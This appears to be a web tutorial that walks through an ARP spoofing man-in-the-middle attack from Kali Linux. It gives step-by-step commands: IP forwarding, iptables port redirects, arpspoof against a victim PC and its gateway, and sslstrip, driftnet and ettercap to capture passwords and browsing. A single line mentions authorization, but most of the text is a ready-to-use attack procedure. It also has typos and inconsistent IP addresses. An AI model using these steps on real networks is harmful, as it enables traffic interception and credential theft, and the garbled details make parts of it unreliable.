ARP spoofing attack – Kali Linux
ARP (Address resolution protocol ). ARP is an ethernet layer 2 address, network hardware address (MAC).
The communication between nodes in the network established between source and destination through layer 2 address, i.e., MAC address , in the network the nodes share their MAC address through broadcast.
Every node in the network maintains an ARP cache table which consists of L2 and L3 addressing (IP address and associated MAC address).
To view ARP table, you can launch the command shell in a windows / terminal in Linux and run below command to the list ARP table.
Windows :c:\arp -a (list all address in ARP table)
Linux : #apr -a (list all address in ARP table)
route / firewall # show arp
ARP spoofing is a technique to manipulate the source and destination by doing ARP poisoning through ARP spoofing , the packet can be sniffed / captured & monitored.
Note: don’t try this on any public, corporate or unauthorized networks . Performed only when you have authorization to do.
spoofing attack using Kali Linux
In our configuration guide we are going to show you packet sniffing & spoofing on Kali Linux.
Let’s assume that you are having below nodes.
1. Attacke PC :-Kali linux (act as a man in the middel between victim PC and Gateway) 192.168.0.252
Attacker PC , In our guide we are using Kali Linux as an attacker machine in order to perform an ARP spoofing attack to victim PC and gateway .
2 Victim PC :- Windows , 192.168.1.23
The ARP spoofing attack will convince the victim machine to send all the packets to attacker machine.
3. Victim Gateway PC:- firewall / router , 192.168.0.253
The ARP spoofing attack on the gateway of victim PC , this will convince gateway to send back all the traffic to attacker PC.
ARP spoofing attack in Kali Linux , follow the below steps .
1. Enable IP forwarder
2. IPtables NAT
3. ARP spoofing Attack
4. Packet sniffing through sslstrip/driftnet/ettercap/urlsnarf
Step 1: enable IP forwarder
IP forwarder must be enabled , it’s required to redirect traffic through attacker PC .
#echo “1” > /proc/sys/net/ipv4/ip_forward
View the value set for ip forwarding, this will return a value 1 if not repeat above step
Output : 1
Step 2: IPtables NAT
Request coming on port 80 will be redirected to user define port number . with the iptable nat rule the victim PC will get internet through attacker PC.
#iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8880
#iptables -t nat -A PREROUTING -p tcp –destination-port 443 -j REDIRECT –to-port 8883
The request received for port number 80 will be redirected to user defined port 8880
Step 3: ARP spoofing attack
Start ARP spoof attack on the victim PC i.e, 192.168.123 and Gateway i.e, 192.168.0.253
Syntax : arpspoof -i interface -t target-ip target-gateway-ip
ARP spoof attacks on victim PC and associated gateway IP as shown below.
#arpspoof -i eth0 -t 192.168.1.23 192.168.0.253
ARP spoof attacks at Victim Gateway as shown below.
#arpspoof -i eth0 -t 192.168.0.253 192.168.1.23
Packet sniffing through sslstrip/drifnet/ettercap/urlsnarf
sslstrip : packet sniffing tool which captures all the sensitive information like username , password ,email account and database user details.
The default sslstrip python scripts are located in /usr/share/sslstrip/
The main executable script ” , run below command to sniff the traffic of target PC “192.168.1.23 ” and specify the port defined in iptable nat rule.
#python /usr/share/sslstrip/sslstrip.py -p -s -l 8880
wait for a while to record sniffing data in logs /usr/share/sslstrip/sslstrip.log or you can use user define file to dump captured data. For more help on using different options with command, use below command.
# sslstrip -h
Press Ctrl+D to stop the service and view the log file.
driftnet: GUI based tool which captures the screen shots of victim PC anything accessed from the browser .
Launch a tool by using below command. But make sure that you have GUI access or logged in GUI mode.
ettercap: Ettercap is the tool used for ARP spoof attack under Window or Linux operating system. It can be used as a command line or GUI.
#ettercap –i eth0 –T -w /root/output.txt –M arp /192.168.1.23 /
-i : define specific interface
-T : to launch command execution over the terminal
-M : Man in middle mode
-w : writes sniffed data to a file.
Watch ,ARP spoofing attack – 1/3
Watch ,ARP spoofing attack – 2/3